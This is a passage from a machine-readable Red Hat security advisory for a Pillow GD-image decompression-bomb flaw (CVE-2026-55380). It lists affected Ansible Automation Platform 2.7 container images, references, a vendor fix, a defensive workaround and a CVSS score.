"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-55380"
},
{
"category": "external",
"summary": "RHBZ#2497455",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497455"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-55380",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-55380"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-55380",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-55380"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst",
"url": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/f39b0ae6624eb2d7c5c5d651d9bb5fdbd96a8675",
"url": "https://github.com/python-pillow/Pillow/commit/f39b0ae6624eb2d7c5c5d651d9bb5fdbd96a8675"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-phj9-mv4w-65pm",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-phj9-mv4w-65pm"
}
],
"release_date": "2026-07-06T18:50:14.789000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:38:09+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.7#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50340"
},
{
"category": "workaround",
"details": "Avoid processing untrusted GD 2.x image files with PIL.GdImageFile.open(). Use Image.open() instead, which includes decompression bomb protections for supported formats. If GdImageFile must be used, validate the image dimensions before calling load(). Restricting accepted image formats at the application boundary to only those explicitly needed can reduce exposure.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
